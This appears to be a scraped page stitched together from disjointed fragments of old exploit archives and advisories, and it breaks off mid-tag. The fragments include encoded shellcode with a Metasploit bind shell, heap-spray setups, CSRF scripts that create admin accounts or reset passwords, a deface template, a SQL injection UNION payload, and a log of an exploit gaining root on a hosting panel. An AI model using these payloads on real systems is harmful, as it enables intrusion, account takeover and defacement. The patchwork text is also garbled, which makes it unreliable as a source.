Next Page >>
var
<script type="text/javascript">
<!--
//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";
var newstack,newstackaddr;
var fakeobj;
var spray,spray2,selarray,readindex,readaddr,optarryaddr;
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )
The default AX control installation path is
C:\Program Files\Hewlett-Packard\HP Info Center
The control contains three potentially insecure methods:
VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
void LaunchApp(String appPath, String params, int cmdShow);
The first and second method are used to access remote registry for read and write by the HP
update and configuration software. To access chosen registry key one must split its path
RELEASE DATE : 13.03.2011
by Alz <cdx[dot]security[at]gmail[dot]com
[-] Google Dork: "Powered by BoutikOne"
[-> categorie.php] Var <path> :
http://[target]/categories.php?path=[sqli]
[-> list.php] Var <path> :
http://[target]/list.php?path=[sqli]
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY
vulnerabilities in this code base which allowed me to string a few cool ones together to make an
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(), these
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most
servers aren't using an exotic character set so from a security stand point this is exactly identical to
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks, look for
stripslashes(),base64decode(),urldecode(),html_entity_decode() lack of quote marks around variables
in a query, ect... Sanitation must ALWAYS be done at the time of use, parametrized queries are a
good example of this. Its impossible to account for all the ways a variable can be mangled once it
Flash versione that you have to export in a swf and import in a iframe
exploit.swf
var action:String = "saveprofile";
var user:String = "nome_user_che_modifichiamo";
var regpass:String = "nuova_pass";
var anag:String = "nome";
var homep:String = "sito_utente";
var prof:String = "professione";
// osX/x86/vforkshell_bind_tcp - 152 bytes
// http://www.metasploit.com
// AppendExit=false, PrependSetresuid=false,
// PrependSetuid=false, LPORT=4444, RHOST=,
// PrependSetreuid=false
var shellcode =
unescape("%uc031%u5099%u5040%u5040%ub052%ucd61%u0f80%u7e82%u0000%u8900%u52c
6%u5252%u0068%u1102%u895c%u6ae3%u5310%u5256%u68b0%u80cd%u6772%u5652%ub052%u
cd6a%u7280%u525e%u5652%ub052%ucd1e%u7280%u8954%u31c7%u83db%u01eb%u5343%u535
7%u5ab0%u80cd%u4372%ufb83%u7503%u31f1%u50c0%u5050%ub050%ucd3b%u9080%u3c90%u
752d%ub009%ucd42%u8380%u00fa%u1774%uc031%u6850%u2f2f%u6873%u2f68%u6962%u896
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
Set desiered user, pass, email and victims url then upload the script
somewhere on the web
*/
window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {
NOT RECOMENDED: Byt you can also just upload a "deface page", something like:
[code]
var title = "Aria-Security.Net";
var bgcolor = "#HEX";
var image_url = "http://ariahosting.ir/index.html";
var text = "The-0utl4w";
var font_color = "#HEX";
- Greetz : xiam ;) Visit: xiam.be
-->
<script type="text/javascript">
window.onload = function() {
var url = "http://[URL]/blocks_edit_do.php";
var bid = [block id];
var topic = [name block];
var content = [cookie stealer];
The parent frame is gonna look something like this:
<iframe src="/" id="m9"></iframe>
<script>
var i = 0;
var emails;
var xhr = new XMLHttpRequest();
var url = "emails.php"
xhr.open("GET", url, true);
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
//server address
var g_sAddress = location.hostname;
var g_sId = "";
var g_sPwd = "";
var g_bLogin = false;
var g_nMaxCamera = 16;
~ <param name="preview" value="0">
~ <param name="faxnum" value>
~ </OBJECT>
<script>
~ var shellcode =
unescape("%u0de8%u0000%u6b00%u7265%u656e%u336c%u2e32%u6c64%u006c%u15ff%u108c%u0040%uf08b%u08e8%u0000%u5700%u6e69%u7845%u6365%u5600%u15ff%u1030%u0040%uec81%u0400%u0000%u016a%u09e8%u0000%u6300%u6c61%u2e63%u7865%u0065%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5600%u15ff%u1030%u0040%u006a%ud0ff");
~ var spraySlide = unescape("%u9090%u9090");
~ var heapSprayToAddress = 0x0c0c0c0c;
<TITLE> 401 Authorization</TITLE>
<META http-equiv=content-type content='text/html; charset=UTF-8'>
<script>
function loadvalue()
{
var enable_recovery="1";
var enter_sn_again="0";
var last_error_sn="2T82195D0093D";
if( enable_recovery == "1" )
Viewing the source code of the recovery questions page allows an
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
Proof of concept
================
<script type="text/javascript">
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
The console is continuously displaying kernel error messages like:
swap_pager_getswapspace(2): failed
swap_pager_getswapspace(16): failed
swap_pager_getswapspace(3): failed
...
pid 61248 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61251 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61146 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61063 (httpd), uid 80 inumber 5 on /var: out of inodes
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
# + Now you can execute commands as root =]
# + root@thegoodone.com: id
#
# uid=0(root) gid=0(root)
#
.firstalt {BACKGROUND-COLOR: "#000000"}
.secondalt {BACKGROUND-COLOR: "#000000"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
#!/usr/bin/perl
#--------------------------------------------------------------------------------
#(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.familycms.com/index.php
#-->DOWNLOAD: http://www.familycms.com/download.php
#-->DEMO: http://www.familycms.com/demo/index.php
III. DESCRIPTION
-------------------------
Joomla! fails to sanitized user supplied input. An attacker can inject
JavaScript or DHTML code that will be executed in the context of
targeted user browser, allowing him to steal cookies. HTTP headers are
not properly parsed, concretly the HTTP_REFERER variable.
Snippet of vulnerable code:
Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.
2. Technical Details
==================================================
File: index.template.html
1) Data enters via URL parameters through the window.location javascript object, is then stored into MMredirectURL variable, and passed to the AC_FL_RunContent() function.
Line 59:
.snip..
var MMredirectURL = window.location;
.snip..
-:: The Advisory ::-
The following files would together be vulnerable to Cross Site Scripting.
1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;
2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert('attempting a crash!');
shellcode = unescape('%u0c0c');
___ BEGIN ___
<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times
because what else?
// This code currently not work on
Solaris/Sparc
-------------------
PROOFS OF CONCEPT:
-------------------
[++] GET var --> 'quiz'
[++] File vuln --> 'num_questions.php'
~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*
<PostLoadScript>
<Language>JScript</Language>
<Function></Function>
<Script_Content>
<
